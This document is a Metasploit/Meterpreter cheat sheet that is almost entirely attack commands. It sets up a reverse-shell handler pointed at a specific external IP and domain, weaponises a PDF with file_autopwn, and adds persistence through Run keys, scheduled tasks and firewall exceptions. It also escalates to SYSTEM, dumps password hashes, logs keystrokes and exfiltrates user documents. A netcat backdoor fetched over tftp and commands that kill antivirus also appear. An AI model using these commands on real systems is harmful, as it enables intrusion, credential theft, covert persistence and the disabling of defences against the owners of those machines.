Metasploit cheat sheet. The commands are as follows:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript <path to the script you want to run automatically after the exploit succeeds>
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
exploit -j -z
__________________________________________________
# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3
wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf
./msfconsole
db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21
setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run
__________________________________________________
# shows all the scripts
run [tab]
__________________________________________________
# persistence! broken if you use a DNS name as LHOST
run persistence -r 75.139.158.51 -p 21 -A -X -i 30
__________________________________________________
run get_pidgin_creds
idletime
sysinfo
__________________________________________________
# SYSTEM SHELL (pick a proc that is run by SYSTEM)
migrate 376
shell
__________________________________________________
# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"
__________________________________________________
# escalate to system
use priv
getsystem
__________________________________________________
execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t
__________________________________________________
# list top used apps
run prefetchtool -x 20
__________________________________________________
# list installed apps
run prefetchtool -p
__________________________________________________
run get_local_subnets
__________________________________________________
# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop" passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
__________________________________________________
# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
__________________________________________________
# alternate to shell, not SYSTEM
# execute -f cmd.exe -H -c -i -t
__________________________________________________
# runs wmic commands etc.
run winenum
# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
__________________________________________________
# Example: download Netcat via tftp and then run it as a backdoor
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
__________________________________________________
# vnc / port fwd for linux
run vnc
__________________________________________________
# priv esc
run kitrap0d
__________________________________________________
run getgui
__________________________________________________
# somewhat broken .. google "sdt cleaner" NtTerminateProcess
run killav
run winenum
run memdump
run screen_unlock
__________________________________________________
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
reg setval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"
__________________________________________________
getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
__________________________________________________
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
__________________________________________________
run msf_bind
run msf_bind -p 1975
rev2self
getuid
__________________________________________________
getuid
enumdesktops
grabdesktop
run deploymsf -f framework-3.3-dev.exe
run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254
__________________________________________________
# Windows login brute force Meterpreter script
run winbf -h
__________________________________________________
# upload a script or executable and run it
uploadexec
__________________________________________________
# Using the payload as a backdoor from a shell
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011
__________________________________________________
# kill AV: this will not unload it from memory; it still needs a reboot or a kill from memory. The Darkspy, Seem and Icesword GUIs can kill the tasks.
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe"